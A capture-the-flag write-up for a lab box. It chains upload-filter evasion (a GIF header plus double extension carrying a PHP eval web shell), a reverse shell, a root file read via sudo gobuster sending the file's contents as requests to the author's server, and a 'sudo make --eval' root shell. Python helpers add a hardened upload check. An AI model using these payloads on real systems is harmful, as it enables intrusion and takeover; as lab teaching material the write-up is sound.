
HMV-up box write-up

This box is fairly interesting: it has a web component, and the privilege escalation is related to the earlier buster box.

# Port scan

```
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.58.3
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-09 20:42 CST
Nmap scan report for bogon (192.168.58.3)
Host is up (0.054s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: RodGar - Subir Imagen
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: C8:21:58:16:CF:C4 (Intel Corporate)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 53.74 ms bogon (192.168.58.3)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.53 seconds
```

Only port 80 is open, so later on we will certainly need a reverse shell.

# Web enumeration

The site is a file upload form that only accepts jpg or gif files.
I tried a lot of approaches here, such as changing the extension in Burp, double extensions and so on, and none of them got past the filter (all the usual CTF tricks).
What finally worked was a GIF file header combined with a double extension.

```php
# filename: shell.php.gif
GIF89a
<?php eval($_POST[1]); ?>
```
But at this point I do not know where the file was uploaded to.

```
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.58.3 -x php,js,txt,jpg,png

Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://192.168.58.3
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,jpg,png,php,js
[+] Timeout: 10s

Starting gobuster in directory enumeration mode

/.php (Status: 403) [Size: 277]
/index.php (Status: 200) [Size: 4489]
/uploads (Status: 301) [Size: 314] [--> http://192.168.58.3/uploads/]
/javascript (Status: 301) [Size: 317] [--> http://192.168.58.3/javascript/]
/sh.jpg (Status: 200) [Size: 1330919]
Progress: 159700 / 1245864 (12.82%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 159700 / 1245864 (12.82%)

Finished
```
There is an uploads directory, but requesting the file name from before directly under that folder still returns nothing, so let's scan the contents of the uploads folder as well.

```
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.58.3//uploads -x php,js,txt,jpg,png

Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://192.168.58.3//uploads
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: js,txt,jpg,png,php
[+] Timeout: 10s

Starting gobuster in directory enumeration mode

/.php (Status: 403) [Size: 964]
/robots.txt (Status: 200) [Size: 1301]
/.php (Status: 403) [Size: 964]
Progress: 639832 / 1245864 (51.36%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 639861 / 1245864 (51.36%)

Finished
```
Requesting robots.txt gives the source code of the upload logic, base64-encoded; decode it with base64.

```
┌──(root㉿kakeru)-[~/tmp]
└─# echo "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" | base64 -d
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $targetDir = "uploads/";
    $fileName = basename($_FILES["image"]["name"]);
    $fileType = pathinfo($fileName, PATHINFO_EXTENSION);
    $fileBaseName = pathinfo($fileName, PATHINFO_FILENAME);

    $allowedTypes = ['jpg', 'jpeg', 'gif'];
    if (in_array(strtolower($fileType), $allowedTypes)) {
        $encryptedFileName = strtr($fileBaseName,
            'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz',
            'NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm');

        $newFileName = $encryptedFileName . "." . $fileType;
        $targetFilePath = $targetDir . $newFileName;

        if (move_uploaded_file($_FILES["image"]["tmp_name"], $targetFilePath)) {
            $message = "El archivo se ha subido correctamente.";
        } else {
            $message = "Hubo un error al subir el archivo.";
        }
    } else {
        $message = "Solo se permiten archivos JPG y GIF.";
    }
}
?>
```
So the upload directory really is uploads/, and the file name is "encrypted" with a substitution cipher (the strtr table is ROT13 over A-Z and a-z). If we upload shell.php.gif, everything before the final gif is shifted and the file is stored as furyy.cuc.gif.
Then connect to it with AntSword (蚁剑) and throw a reverse shell from AntSword's virtual terminal.
![](https://pic1.imgdb.cn/item/67cda033066befcec6e231b0.png)
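An added example (my own code, not the box's handler) that models the recovered PHP in Python: `stored_name` reproduces the ROT13 rename, `vulnerable_accepts` mirrors the last-extension-only check that lets a double extension through, and `hardened_accepts` / `random_stored_name` show a defensive version (single extension, magic bytes, unpredictable stored name); all function names are assumptions of mine.

```python
import codecs
import os
import secrets

# Constructed model of the upload handler shown above; names are my own.
ALLOWED = {"jpg", "jpeg", "gif"}
GIF_MAGIC = (b"GIF87a", b"GIF89a")
JPEG_MAGIC = (b"\xff\xd8\xff",)


def stored_name(filename: str) -> str:
    """Reproduce the page's rename: strtr over A-Za-z is ROT13 applied to
    the base name (PATHINFO_FILENAME); the last extension is kept as is."""
    base, ext = os.path.splitext(filename)      # "shell.php", ".gif"
    return codecs.encode(base, "rot_13") + ext  # "furyy.cuc.gif"


def vulnerable_accepts(filename: str) -> bool:
    """The original check: only the LAST extension is compared with the
    allow-list, so a name with two extensions passes as long as the final
    one is jpg/jpeg/gif."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    return ext in ALLOWED


def hardened_accepts(filename: str, content: bytes) -> bool:
    """Defensive check: exactly one extension, it must be allow-listed, and
    the content must start with the magic bytes of the claimed type.
    Disabling script execution in the uploads directory is still required;
    this is defence in depth, not a replacement for it."""
    parts = os.path.basename(filename).split(".")
    if len(parts) != 2 or not parts[0]:        # rejects 'a.php.gif', '.gif'
        return False
    ext = parts[1].lower()
    if ext not in ALLOWED:
        return False
    magic = GIF_MAGIC if ext == "gif" else JPEG_MAGIC
    return content.startswith(magic)


def random_stored_name(ext: str) -> str:
    """Hardened naming: a random name instead of reversible ROT13, so the
    stored path cannot be derived from the uploaded file name."""
    return secrets.token_hex(8) + "." + ext.lower()
```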

```
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

# Privilege escalation
## www

```
www-data@debian:/var/www/html/uploads$ sudo -l
Matching Defaults entries for www-data on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin, use_pty

User www-data may run the following commands on debian:
(ALL) NOPASSWD: /usr/bin/gobuster
```
We have sudo rights on gobuster. Does that look familiar? It is a lot like the buster box.
However, a linpeas.sh scan shows no cron jobs this time.
There is, though, a hint file in the upload directory.

```
www-data@debian:/var/www/html/uploads$ ls
access_denied.html clue.txt furyy.cuc.gif robots.txt
www-data@debian:/var/www/html/uploads$ cat clue.txt
/root/rodgarpass
```
Back when we had sudo rights on gobuster before, we used a wordlist to get the content of a chosen path written into a cron file owned by root, so that root would execute it.
For example: I start an HTTP server on my own machine serving a file /tmp/b, and on the target I create a wordlist b.txt whose content is /tmp/b, so that /tmp/b ends up written into the cron job.
Because that cron job runs under bash, we put a reverse shell into /tmp/b on the target. That is the recap of the earlier privilege escalation method, but this box is clearly not set up that way.

The hint now is /root/rodgarpass, so the idea is to use gobuster to read the contents of that file. That is also simple: start an HTTP server locally and pass this file as the wordlist.

```
┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

```
www-data@debian:/var/www/html/uploads$ sudo gobuster dir -u 192.168.58.11 -w /root/rodgarpass -v

Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://192.168.58.11
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /root/rodgarpass
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Verbose: true
[+] Timeout: 10s

2025/03/09 08:14:33 Starting gobuster in directory enumeration mode

Missed: /b45cffe084dd3d20d928bee85e7b0f2 (Status: 404) [Size: 335]

2025/03/09 08:14:34 Finished
```
With -v gobuster prints every request, and we see this value, which is an MD5 hash (another way is to read the HTTP server log on our own machine to see which path was requested).
An online lookup decodes it to `string`, but the captured value is only 31 characters long, while a real MD5 has 32.

Hashing `string` with MD5 gives the full value `b45cffe084dd3d20d928bee85e7b0f21`, and that is the user's password.
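An added example (not from the write-up) that checks the 31-versus-32 character point with hashlib: `is_full_md5` validates the digest length, and `complete_md5` confirms a lookup-site guess by testing whether its MD5 starts with the truncated value gobuster printed; both function names are assumptions of mine.

```python
import hashlib
from typing import Iterable, Optional

# The truncated value as printed by gobuster above (31 hex characters).
TRUNCATED = "b45cffe084dd3d20d928bee85e7b0f2"
MD5_HEX_LEN = 32  # MD5 is 128 bits, i.e. 32 hex digits


def is_full_md5(value: str) -> bool:
    """True only for a complete 32-character hex MD5 digest."""
    value = value.lower()
    return len(value) == MD5_HEX_LEN and all(c in "0123456789abcdef" for c in value)


def complete_md5(truncated: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the full MD5 digest of the first candidate plaintext whose hash
    starts with the truncated value, or None if no candidate matches.
    Re-hashing is the only reliable way to recover the missing characters
    when the captured value has been cut short."""
    prefix = truncated.lower()
    for word in candidates:
        digest = hashlib.md5(word.encode()).hexdigest()
        if digest.startswith(prefix):
            return digest
    return None
```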
## rodgar

```
rodgar@debian:~$ sudo -l
Matching Defaults entries for rodgar on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin, use_pty

User rodgar may run the following commands on debian:
(ALL : ALL) NOPASSWD: /usr/bin/gcc, /usr/bin/make
```
Either command can be used to escalate; I'll use make here. The payloads for both can be found on GTFOBins.
![](https://pic1.imgdb.cn/item/67cda2df066befcec6e23284.png)

```
rodgar@debian:~$ sudo make -s --eval=$'x:\n\t-'"/bin/bash"
root@debian:/home/rodgar# id
uid=0(root) gid=0(root) grupos=0(root)
```


### Summary
- Learned another file upload bypass technique
- When the web root gives nothing, scan the uploads directory
- Arbitrary file read through sudo rights on gobuster
- An MD5 hash is 32 characters long
- If an MD5 value has the wrong length, look it up on a decoding site and then re-hash the result